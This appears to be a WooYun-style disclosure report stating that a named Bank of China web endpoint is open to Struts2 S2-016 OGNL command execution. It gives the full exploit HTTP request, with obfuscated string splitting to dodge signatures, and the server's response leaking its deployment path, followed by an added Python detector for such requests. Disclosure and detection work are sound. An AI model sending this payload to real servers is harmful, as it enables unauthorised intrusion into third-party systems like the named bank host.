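2016-06-24: Details reported to the vendor; awaiting vendor handling
2016-06-24: Vendor has viewed the vulnerability; details disclosed to the vendor only
2016-06-30: Vendor has actively ignored the vulnerability; details disclosed to the public
As per the title.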
https://jf365.boc.cn/BOCGIFTORDERNET/defaultIndex.do
The S2-016 command execution vulnerability is present.
POST /BOCGIFTORDERNET/defaultIndex.do HTTP/1.1
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (baidu spider)
Host: jf365.boc.cn
Cookie:
Content-Type: multipart/form-data; boundary=------------------------4a606c052a893987
Content-Length: 566

--------------------------4a606c052a893987
Content-Disposition: form-data; name="redirect:${#req=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletReq'+'uest'),#resp=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletRes'+'ponse'),#resp.setCharacterEncoding('UTF-8'),#resp.getWriter().print("web"),#resp.getWriter().print("path:"),#resp.getWriter().print(#req.getSession().getServletContext().getRealPath("/")),#resp.getWriter().flush(),#resp.getWriter().close()}"

-1
--------------------------4a606c052a893987--

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2016 14:17:24 GMT
X-Powered-By: Servlet/3.0
Set-Cookie: JSESSIONID=00001VXd-hGv_3A9iBJ7aBZADrE:1ad27visj; Path=/; HttpOnly
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=1
Connection: Keep-Alive
Content-Language: zh-CN
Content-Length: 84

webpath:/websphere/IBM/WebSphere/BOCapps/BOCGIFTORDERNET_war.ear/BOCGIFTORDERNET.war
Upgrade.
Severity: No impact (ignored by vendor)
Ignored at: 2016-06-30 02:25
Vulnerability Rank: 15 (WooYun rating)
None yet.
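For detection on the defending side: the request above carries its OGNL expression in a multipart field name prefixed with "redirect:", and splits class names with '+' so that signatures on those names miss it. The following is an added example, not part of the original report; the function names and sample body are constructed for illustration. It flags parameter names that combine a Struts 2 action-mapper prefix with OGNL expression delimiters, in the query string, in urlencoded bodies and in multipart bodies.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameter-name prefixes given special meaning by the Struts 2 action mapper.
PREFIX_RE = re.compile(r"^(redirect|redirectAction|action):", re.I)
# OGNL expression delimiters. Matching on these, not on class names, survives
# the 'co'+'m.open'+... string splitting seen in the request above.
OGNL_RE = re.compile(r"[$%]\{")
# Multipart field name, taken greedily to the last quote on the line because
# the expression itself may contain double quotes.
DISPOSITION_RE = re.compile(
    rb'^Content-Disposition:\s*form-data;\s*name="(.*)"\s*$', re.I | re.M)


def param_names(target, content_type, body):
    """Collect parameter names from the query string and the request body."""
    names = [k for k, _ in parse_qsl(urlsplit(target).query,
                                     keep_blank_values=True)]
    ctype = content_type.lower()
    if ctype.startswith("application/x-www-form-urlencoded"):
        names += [k for k, _ in parse_qsl(body.decode("latin-1"),
                                          keep_blank_values=True)]
    elif ctype.startswith("multipart/form-data"):
        names += [m.decode("latin-1") for m in DISPOSITION_RE.findall(body)]
    return names


def suspicious_params(target, content_type, body):
    """Return names with a mapper prefix AND an OGNL delimiter.

    A bare prefix such as 'action:save' is a legitimate submit-button name,
    so the prefix alone is not flagged.
    """
    return [n for n in param_names(target, content_type, body)
            if PREFIX_RE.match(n) and OGNL_RE.search(n)]


# Constructed sample body (not captured traffic).
SAMPLE_BODY = (
    b"--XBOUNDARY\r\n"
    b'Content-Disposition: form-data; '
    b'name="redirect:${#resp.getWriter().print("web")}"\r\n'
    b"\r\n-1\r\n"
    b"--XBOUNDARY--\r\n"
)

if __name__ == "__main__":
    print(suspicious_params("/defaultIndex.do",
                            "multipart/form-data; boundary=XBOUNDARY",
                            SAMPLE_BODY))
```

A hit from this check is a reason to confirm the Struts 2 version behind the endpoint; the fix remains the upgrade recommended in the report.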